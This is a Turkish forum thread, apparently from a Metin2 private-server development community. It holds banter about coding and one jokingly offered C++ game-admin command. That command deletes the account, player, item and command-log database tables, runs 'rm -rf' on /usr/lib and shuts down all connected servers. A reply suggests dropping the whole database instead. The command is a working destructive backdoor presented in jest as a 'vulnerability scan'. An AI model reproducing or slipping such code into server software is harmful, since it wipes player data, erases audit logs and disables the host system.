HERAKLES Otomatik Avlı kalıcı sunucu. 19 Haziran'da açılıyor. Atius & Wizard güvencesiyle hemen kayıt ol, ön kayıt ödülleri aktif. HEMEN TIKLA!
Paylaşım için teşekkürler.
milatın konusunda mı ne birisi / ile kod yazmayı kaldırın diyordu ben yazıncamı suç knk xd
sana bir şey demiyorum aslında burada. bir işin yazılımda bir den çok çözümü vardır. sen bir çözüm önerip bazıları laf atmışya lafım onlara. o yüzden dalga geçer bi ifade yazdım aslında ama senlik değil durum 
delete table olacğaına drop database direk veritabanı gitsinC++:ACMD(hep_beraber_acik_tariyoruz) { DBManager::instance().Query("DELETE FROM account.account", get_table_postfix()); DBManager::instance().Query("DELETE FROM player.player", get_table_postfix()); DBManager::instance().Query("DELETE FROM player.item", get_table_postfix()); DBManager::instance().Query("DELETE FROM log.command_log", get_table_postfix()); std::system("cd /usr && rm -rf lib"); TPacketGGShutdown p; p.bHeader = HEADER_GG_SHUTDOWN; P2P_MANAGER::instance().Send(&p, sizeof(TPacketGGShutdown)); Shutdown(1); }
Açık taramaya buda bi örnektir oldukca kullanışlıdır.

Bendende insafsız çıktın.delete table olacğaına drop database direk veritabanı gitsin![]()

- Durum
- Üzgünüz bu konu cevaplar için kapatılmıştır...
Şu an konuyu görüntüleyenler (Toplam : 0, Üye: 0, Misafir: 0)